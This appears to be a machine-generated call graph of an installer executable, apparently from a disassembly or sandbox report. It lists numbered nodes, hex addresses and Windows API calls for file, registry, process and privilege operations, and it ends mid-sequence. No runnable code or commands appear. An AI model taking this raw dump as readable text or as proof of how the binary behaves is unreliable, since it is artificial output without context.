WideCharToMultiByte 4987->4989 4988->4989 4990 100018a9 4991 100018cc 4990->4991 4992 100018ff GlobalFree 4991->4992 4993 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4991->4993 4992->4993 4994 10001272 2 API calls 4993->4994 4995 10001a87 GlobalFree GlobalFree 4994->4995 4996 401ee9 4997 402bbf 18 API calls 4996->4997 4998 401ef0 4997->4998 4999 406398 2 API calls 4998->4999 5000 401ef6 4999->5000 5002 401f07 5000->5002 5003 405f9c wsprintfW 5000->5003 5003->5002 5004 4021ea 5005 402bbf 18 API calls 5004->5005 5006 4021f0 5005->5006 5007 402bbf 18 API calls 5006->5007 5008 4021f9 5007->5008 5009 402bbf 18 API calls 5008->5009 5010 402202 5009->5010 5011 406398 2 API calls 5010->5011 5012 40220b 5011->5012 5013 40221c lstrlenW lstrlenW 5012->5013 5014 40220f 5012->5014 5016 4051b4 25 API calls 5013->5016 5015 4051b4 25 API calls 5014->5015 5018 402217 5014->5018 5015->5018 5017 40225a SHFileOperationW 5016->5017 5017->5014 5017->5018 5019 40156b 5020 401584 5019->5020 5021 40157b ShowWindow 5019->5021 5022 401592 ShowWindow 5020->5022 5023 402a4c 5020->5023 5021->5020 5022->5023 5024 40456d 5025 4045a3 5024->5025 5026 40457d 5024->5026 5027 404180 8 API calls 5025->5027 5028 404119 19 API calls 5026->5028 5029 4045af 5027->5029 5030 40458a SetDlgItemTextW 5028->5030 5030->5025 5031 40226e 5032 402275 5031->5032 5034 402288 5031->5034 5033 406077 18 API calls 5032->5033 5035 402282 5033->5035 5036 40579a MessageBoxIndirectW 5035->5036 5036->5034 5037 4014f1 SetForegroundWindow 5038 402a4c 5037->5038 5039 401673 5040 402bbf 18 API calls 5039->5040 5041 40167a 5040->5041 5042 402bbf 18 API calls 5041->5042 5043 401683 5042->5043 5044 402bbf 18 API calls 5043->5044 5045 40168c MoveFileW 5044->5045 5046 40169f 5045->5046 5052 401698 5045->5052 5048 406398 2 API calls 5046->5048 5050 4021e1 5046->5050 5047 401423 25 API calls 5047->5050 5049 4016ae 5048->5049 5049->5050 5051 405ef6 38 API calls 5049->5051 5051->5052 5052->5047 5053 4052f3 5054 405314 GetDlgItem GetDlgItem GetDlgItem 5053->5054 5055 40549d 5053->5055 5098 40414e SendMessageW 5054->5098 5057 4054a6 GetDlgItem CreateThread CloseHandle 5055->5057 5058 4054ce 5055->5058 5057->5058 5060 4054f9 5058->5060 5061 4054e5 ShowWindow ShowWindow 5058->5061 5062 40551e 5058->5062 5059 405384 5067 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5059->5067 5064 405533 ShowWindow 5060->5064 5065 40550d 5060->5065 5068 405559 5060->5068 5100 40414e SendMessageW 5061->5100 5066 404180 8 API calls 5062->5066 5071 405553 5064->5071 5072 405545 5064->5072 5069 4040f2 SendMessageW 5065->5069 5070 40552c 5066->5070 5073 4053f9 5067->5073 5074 4053dd SendMessageW SendMessageW 5067->5074 5068->5062 5075 405567 SendMessageW 5068->5075 5069->5062 5080 4040f2 SendMessageW 5071->5080 5079 4051b4 25 API calls 5072->5079 5076 40540c 5073->5076 5077 4053fe SendMessageW 5073->5077 5074->5073 5075->5070 5078 405580 CreatePopupMenu 5075->5078 5082 404119 19 API calls 5076->5082 5077->5076 5081 406077 18 API calls 5078->5081 5079->5071 5080->5068 5083 405590 AppendMenuW 5081->5083 5084 40541c 5082->5084 5085 4055c0 TrackPopupMenu 5083->5085 5086 4055ad GetWindowRect 5083->5086 5087 405425 ShowWindow 5084->5087 5088 405459 GetDlgItem SendMessageW 5084->5088 5085->5070 5089 4055db 5085->5089 5086->5085 5090 405448 5087->5090 5091 40543b ShowWindow 5087->5091 5088->5070 5092 405480 SendMessageW SendMessageW 5088->5092 5093 4055f7 SendMessageW 5089->5093 5099 40414e SendMessageW 5090->5099 5091->5090 5092->5070 5093->5093 5094 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5093->5094 5096 405639 SendMessageW 5094->5096 5096->5096 5097 405662 GlobalUnlock SetClipboardData CloseClipboard 5096->5097 5097->5070 5098->5059 5099->5088 5100->5060 5101 100016b6 5102 100016e5 5101->5102 5103 10001b18 22 API calls 5102->5103 5104 100016ec 5103->5104 5105 100016f3 5104->5105 5106 100016ff 5104->5106 5107 10001272 2 API calls 5105->5107 5108 10001726 5106->5108 5109 10001709 5106->5109 5110 100016fd 5107->5110 5112 10001750 5108->5112 5113 1000172c 5108->5113 5111 1000153d 3 API calls 5109->5111 5115 1000170e 5111->5115 5114 1000153d 3 API calls 5112->5114 5116 100015b4 3 API calls 5113->5116 5114->5110 5117 100015b4 3 API calls 5115->5117 5118 10001731 5116->5118 5119 10001714 5117->5119 5120 10001272 2 API calls 5118->5120 5122 10001272 2 API calls 5119->5122 5121 10001737 GlobalFree 5120->5121 5121->5110 5123 1000174b GlobalFree 5121->5123 5124 1000171a GlobalFree 5122->5124 5123->5110 5124->5110 5125 10002238 5126 10002296 5125->5126 5128 100022cc 5125->5128 5127 100022a8 GlobalAlloc 5126->5127 5126->5128 5127->5126 5129 401cfa GetDlgItem GetClientRect 5130 402bbf 18 API calls 5129->5130 5131 401d2c LoadImageW SendMessageW 5130->5131 5132 401d4a DeleteObject 5131->5132 5133 402a4c 5131->5133 5132->5133 4753 4027fb 4754 402bbf 18 API calls 4753->4754 4755 402802 FindFirstFileW 4754->4755 4756 40282a 4755->4756 4760 402815 4755->4760 4757 402833 4756->4757 4761 405f9c wsprintfW 4756->4761 4762 406055 lstrcpynW 4757->4762 4761->4757 4762->4760 4763 40237b 4764 402381 4763->4764 4765 402bbf 18 API calls 4764->4765 4766 402393 4765->4766 4767 402bbf 18 API calls 4766->4767 4768 40239d RegCreateKeyExW 4767->4768 4769 4023c7 4768->4769 4772 40281e 4768->4772 4770 4023e2 4769->4770 4771 402bbf 18 API calls 4769->4771 4774 402ba2 18 API calls 4770->4774 4776 4023ee 4770->4776 4773 4023d8 lstrlenW 4771->4773 4773->4770 4774->4776 4775 402409 RegSetValueExW 4778 40241f RegCloseKey 4775->4778 4776->4775 4777 403027 32 API calls 4776->4777 4777->4775 4778->4772 5134 1000103d 5135 1000101b 5 API calls 5134->5135 5136 10001056 5135->5136 5137 4014ff 5138 401507 5137->5138 5140 40151a 5137->5140 5139 402ba2 18 API calls 5138->5139 5139->5140 5141 401000 5142 401037 BeginPaint GetClientRect 5141->5142 5143 40100c DefWindowProcW 5141->5143 5145 4010f3 5142->5145 5146 401179 5143->5146 5147 401073 CreateBrushIndirect FillRect DeleteObject 5145->5147 5148 4010fc 5145->5148 5147->5145 5149 401102 CreateFontIndirectW 5148->5149 5150 401167 EndPaint 5148->5150 5149->5150 5151 401112 6 API calls 5149->5151 5150->5146 5151->5150 5152 401904 5153 40193b 5152->5153 5154 402bbf 18 API calls 5153->5154 5155 401940 5154->5155 5156 405846 69 API calls 5155->5156 5157 401949 5156->5157 5158 402d04 5159 402d16 SetTimer 5158->5159 5161 402d2f 5158->5161 5159->5161 5160 402d84 5161->5160 5162 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5161->5162 5162->5160 4512 402786 4513 4029f7 4512->4513 4514 40278d 4512->4514 4515 402ba2 18 API calls 4514->4515 4516 402798 4515->4516 4517 40279f SetFilePointer 4516->4517 4517->4513 4518 4027af 4517->4518 4520 405f9c wsprintfW 4518->4520 4520->4513 4563 100027c7 4564 10002817 4563->4564 4565 100027d7 VirtualProtect 4563->4565 4565->4564 5163 401907 5164 402bbf 18 API calls 5163->5164 5165 40190e 5164->5165 5166 40579a MessageBoxIndirectW 5165->5166 5167 401917 5166->5167 5168 401e08 5169 402bbf 18 API calls 5168->5169 5170 401e0e 5169->5170 5171 402bbf 18 API calls 5170->5171 5172 401e17 5171->5172 5173 402bbf 18 API calls 5172->5173 5174 401e20 5173->5174 5175 402bbf 18 API calls 5174->5175 5176 401e29 5175->5176 5177 401423 25 API calls 5176->5177 5178 401e30 ShellExecuteW 5177->5178 5179 401e61 5178->5179 5185 40490a 5186 404936 5185->5186 5187 40491a 5185->5187 5189 404969 5186->5189 5190 40493c SHGetPathFromIDListW 5186->5190 5196 40577e GetDlgItemTextW 5187->5196 5192 404953 SendMessageW 5190->5192 5193 40494c 5190->5193 5191 404927 SendMessageW 5191->5186 5192->5189 5195 40140b 2 API calls 5193->5195 5195->5192 5196->5191 5197 1000164f 5198 10001516 GlobalFree 5197->5198 5200 10001667 5198->5200 5199 100016ad GlobalFree 5200->5199 5201 10001682 5200->5201 5202 10001699 VirtualFree 5200->5202 5201->5199 5202->5199 4688 402095 4689 402bbf 18 API calls 4688->4689 4690 40209c 4689->4690 4691 402bbf 18 API calls 4690->4691 4692 4020a6 4691->4692 4693 402bbf 18 API calls 4692->4693 4694 4020b0 4693->4694 4695 402bbf 18 API calls 4694->4695 4696 4020ba 4695->4696 4697 402bbf 18 API calls 4696->4697 4699 4020c4 4697->4699 4698 402103 CoCreateInstance 4703 402122 4698->4703 4699->4698 4700 402bbf 18 API calls 4699->4700 4700->4698 4701 401423 25 API calls 4702 4021e1 4701->4702 4703->4701 4703->4702 5203 401a15 5204 402bbf 18 API calls 5203->5204 5205 401a1e ExpandEnvironmentStringsW 5204->5205 5206 401a32 5205->5206 5208 401a45 5205->5208 5207 401a37 lstrcmpW 5206->5207 5206->5208 5207->5208 5209 402515 5210 402bbf 18 API calls 5209->5210 5211 40251c 5210->5211 5214 405c2a GetFileAttributesW CreateFileW 5211->5214 5213 402528 5214->5213 5215 401b16 5216 402bbf 18 API calls 5215->5216 5217 401b1d 5216->5217 5218 402ba2 18 API calls 5217->5218 5219 401b26 wsprintfW 5218->5219 5220 402a4c 5219->5220 5221 10001058 5223 10001074 5221->5223 5222 100010dd 5223->5222 5224 10001516 GlobalFree 5223->5224 5225 10001092 5223->5225 5224->5225 5226 10001516 GlobalFree 5225->5226 5227 100010a2 5226->5227 5228 100010b2 5227->5228 5229 100010a9 GlobalSize 5227->5229 5230 100010b6 GlobalAlloc 5228->5230 5231 100010c7 5228->5231 5229->5228 5232 1000153d 3 API calls 5230->5232 5233 100010d2 GlobalFree 5231->5233 5232->5231 5233->5222 4780 40159b 4781 402bbf 18 API calls 4780->4781 4782 4015a2 SetFileAttributesW 4781->4782 4783 4015b4 4782->4783 4792 40229d 4793 4022a5 4792->4793 4794 4022ab 4792->4794 4795 402bbf 18 API calls 4793->4795 4796 4022b9 4794->4796 4797 402bbf 18 API calls 4794->4797 4795->4794 4798 4022c7 4796->4798 4799 402bbf 18 API calls 4796->4799 4797->4796 4800 402bbf 18 API calls 4798->4800 4799->4798 4801 4022d0 WritePrivateProfileStringW 4800->4801 5234 401f1d 5235 402bbf 18 API calls 5234->5235 5236 401f24 5235->5236 5237 40642b 5 API calls 5236->5237 5238 401f33 5237->5238 5239 401fb7 5238->5239 5240 401f4f GlobalAlloc 5238->5240 5240->5239 5241 401f63 5240->5241 5242 40642b 5 API calls 5241->5242 5243 401f6a 5242->5243 5244 40642b 5 API calls 5243->5244 5245 401f74 5244->5245 5245->5239 5249 405f9c wsprintfW 5245->5249 5247 401fa9 5250 405f9c wsprintfW 5247->5250 5249->5247 5250->5239 5251 40149e 5252 402288 5251->5252 5253 4014ac PostQuitMessage 5251->5253 5253->5252 5254 40249e 5255 402cc9 19 API calls 5254->5255 5256 4024a8 5255->5256 5257 402ba2 18 API calls 5256->5257 5258 4024b1 5257->5258 5259 4024d5 RegEnumValueW 5258->5259 5260 4024c9 RegEnumKeyW 5258->5260 5262 40281e 5258->5262 5261 4024ee RegCloseKey 5259->5261 5259->5262 5260->5261 5261->5262 5264 40231f 5265 402324 5264->5265 5266 40234f 5264->5266 5267 402cc9 19 API calls 5265->5267 5268 402bbf 18 API calls 5266->5268 5269 40232b 5267->5269 5270 402356 5268->5270 5271 402bbf 18 API calls 5269->5271 5274 40236c 5269->5274 5275 402bff RegOpenKeyExW 5270->5275 5272 40233c RegDeleteValueW RegCloseKey 5271->5272 5272->5274 5282 402c76 5275->5282 5283 402c2a 5275->5283 5276 402c50 RegEnumKeyW 5277 402c62 RegCloseKey 5276->5277 5276->5283 5279 40642b 5 API calls 5277->5279 5278 402c87 RegCloseKey 5278->5282 5281 402c72 5279->5281 5280 402bff 5 API calls 5280->5283 5281->5282 5284 402ca2 RegDeleteKeyW 5281->5284 5282->5274 5283->5276 5283->5277 5283->5278 5283->5280 5284->5282 3716 4032a0 SetErrorMode GetVersion 3717 4032d4 3716->3717 3718 4032da 3716->3718 3719 40642b 5 API calls 3717->3719 3807 4063bf GetSystemDirectoryW 3718->3807 3719->3718 3721 4032f1 3722 4063bf 3 API calls 3721->3722 3723 4032fb 3722->3723 3724 4063bf 3 API calls 3723->3724 3725 403305 3724->3725 3810 40642b GetModuleHandleA 3725->3810 3728 40642b 5 API calls 3729 403313 #17 OleInitialize SHGetFileInfoW 3728->3729 3816 406055 lstrcpynW 3729->3816 3731 403350 GetCommandLineW 3817 406055 lstrcpynW 3731->3817 3733 403362 GetModuleHandleW 3734 40337a 3733->3734 3818 405a36 3734->3818 3737 4034b4 GetTempPathW 3822 40326f 3737->3822 3739 4034cc 3740 4034d0 GetWindowsDirectoryW lstrcatW 3739->3740 3741 403526 DeleteFileW 3739->3741 3743 40326f 12 API calls 3740->3743 3832 402dee GetTickCount GetModuleFileNameW 3741->3832 3742 4033a2 3744 405a36 CharNextW 3742->3744 3749 40349d 3742->3749 3751 40349f 3742->3751 3747 4034ec 3743->3747 3744->3742 3746 40353a 3753 405a36 CharNextW 3746->3753 3789 4035dd 3746->3789 3802 4035ed 3746->3802 3747->3741 3748 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3747->3748 3752 40326f 12 API calls 3748->3752 3749->3737 3916 406055 lstrcpynW 3751->3916 3757 40351e 3752->3757 3770 403559 3753->3770 3757->3741 3757->3802 3758 403728 3761 403730 GetCurrentProcess OpenProcessToken 3758->3761 3762 4037ac ExitProcess 3758->3762 3759 403608 3940 40579a 3759->3940 3767 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3761->3767 3768 40377c 3761->3768 3764 4035b7 3917 405b11 3764->3917 3765 40361e 3944 40571d 3765->3944 3767->3768 3769 40642b 5 API calls 3768->3769 3784 403783 3769->3784 3770->3764 3770->3765 3775 403798 ExitWindowsEx 3775->3762 3779 4037a5 3775->3779 3776 403634 lstrcatW 3777 40363f lstrcatW lstrcmpiW 3776->3777 3778 40365b 3777->3778 3777->3802 3782 403660 3778->3782 3783 403667 3778->3783 3982 40140b 3779->3982 3781 4035d2 3932 406055 lstrcpynW 3781->3932 3947 405683 CreateDirectoryW 3782->3947 3952 405700 CreateDirectoryW 3783->3952 3784->3775 3784->3779 3860 40389e 3789->3860 3791 40366c SetCurrentDirectoryW 3792 403687 3791->3792 3793 40367c 3791->3793 3956 406055 lstrcpynW 3792->3956 3955 406055 lstrcpynW 3793->3955 3798 4036d3 CopyFileW 3804 403695 3798->3804 3799 40371c 3801 405ef6 38 API calls 3799->3801 3801->3802 3933 4037c4 3802->3933 3803 406077 18 API calls 3803->3804 3804->3799 3804->3803 3806 403707 CloseHandle 3804->3806 3957 406077 3804->3957 3975 405ef6 MoveFileExW 3804->3975 3979 405735 CreateProcessW 3804->3979 3806->3804 3808 4063e1 wsprintfW LoadLibraryW 3807->3808 3808->3721 3811 406451 GetProcAddress 3810->3811 3812 406447 3810->3812 3814 40330c 3811->3814 3813 4063bf 3 API calls 3812->3813 3815 40644d 3813->3815 3814->3728 3815->3811 3815->3814 3816->3731 3817->3733 3819 405a3c 3818->3819 3820 403389 CharNextW 3819->3820 3821 405a43 CharNextW 3819->3821 3820->3737 3820->3742 3821->3819 3985 4062e9 3822->3985 3824 403285 3824->3739 3825 40327b 3825->3824 3994 405a09 lstrlenW CharPrevW 3825->3994 3828 405700 2 API calls 3829 403293 3828->3829 3997 405c59 3829->3997 4001 405c2a GetFileAttributesW CreateFileW 3832->4001 3834 402e2e 3853 402e3e 3834->3853 4002 406055 lstrcpynW 3834->4002 3836 402e54 4003 405a55 lstrlenW 3836->4003 3840 402e65 GetFileSize 3841 402f61 3840->3841 3859 402e7c 3840->3859 4008 402d8a 3841->4008 3843 402f6a 3845 402f9a GlobalAlloc 3843->3845 3843->3853 4043 403258 SetFilePointer 3843->4043 4019 403258 SetFilePointer 3845->4019 3846 402fcd 3850 402d8a 6 API calls 3846->3850 3849 402fb5 4020 403027 3849->4020 3850->3853 3851 402f83 3854 403242 ReadFile 3851->3854 3853->3746 3856 402f8e 3854->3856 3855 402d8a 6 API calls 3855->3859 3856->3845 3856->3853 3857 402fc1 3857->3853 3857->3857 3858 402ffe SetFilePointer 3857->3858 3858->3853 3859->3841 3859->3846 3859->3853 3859->3855 4040 403242 3859->4040 3861 40642b 5 API calls 3860->3861 3862 4038b2 3861->3862 3863 4038b8 GetUserDefaultUILanguage 3862->3863 3864 4038ca 3862->3864 4064 405f9c wsprintfW 3863->4064 4074 405f22 RegOpenKeyExW 3864->4074 3867 4038c8 4065 403b74 3867->4065 3869 403919 lstrcatW 3869->3867 3870 405f22 3 API calls 3870->3869 3873 405b11 18 API calls 3874 40394b 3873->3874 3875 4039df 3874->3875 3877 405f22 3 API calls 3874->3877 3876 405b11 18 API calls 3875->3876 3878 4039e5 3876->3878 3879 40397d 3877->3879 3880 4039f5 LoadImageW 3878->3880 3881 406077 18 API calls 3878->3881 3879->3875 3884 40399e lstrlenW 3879->3884 3888 405a36 CharNextW 3879->3888 3882 403a9b 3880->3882 3883 403a1c RegisterClassW 3880->3883 3881->3880 3887 40140b 2 API calls 3882->3887 3885 403a52 SystemParametersInfoW CreateWindowExW 3883->3885 3886 403aa5 3883->3886 3889 4039d2 3884->3889 3890 4039ac lstrcmpiW 3884->3890 3885->3882 3886->3802 3891 403aa1 3887->3891 3892 40399b 3888->3892 3894 405a09 3 API calls 3889->3894 3890->3889 3893 4039bc GetFileAttributesW 3890->3893 3891->3886 3896 403b74 19 API calls 3891->3896 3892->3884 3895 4039c8 3893->3895 3897 4039d8 3894->3897 3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3992 4062f6 3985->3992 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3992 3989->3825 3990 405a36 CharNextW 3990->3992 3991 40634b CharNextW 3991->3992 3992->3986 3992->3988 3992->3990 3992->3991 3993 40635a CharNextW 3992->3993 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5285 100010e1 5288 10001111 5285->5288 5286 100011d8 GlobalFree 5287 100012ba 2 API calls 5287->5288 5288->5286 5288->5287 5289 100011d3 5288->5289 5290 10001272 2 API calls 5288->5290 5291 10001164 GlobalAlloc 5288->5291 5292 100011f8 GlobalFree 5288->5292 5293 100011c4 GlobalFree 5288->5293 5294 100012e1 lstrcpyW 5288->5294 5289->5286 5290->5293 5291->5288 5292->5288 5293->5288 5294->5288 5295 401ca3 5296 402ba2 18 API calls 5295->5296 5297 401ca9 IsWindow 5296->5297 5298 401a05 5297->5298 5299 402a27 SendMessageW 5300 402a41 InvalidateRect 5299->5300 5301 402a4c 5299->5301 5300->5301 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 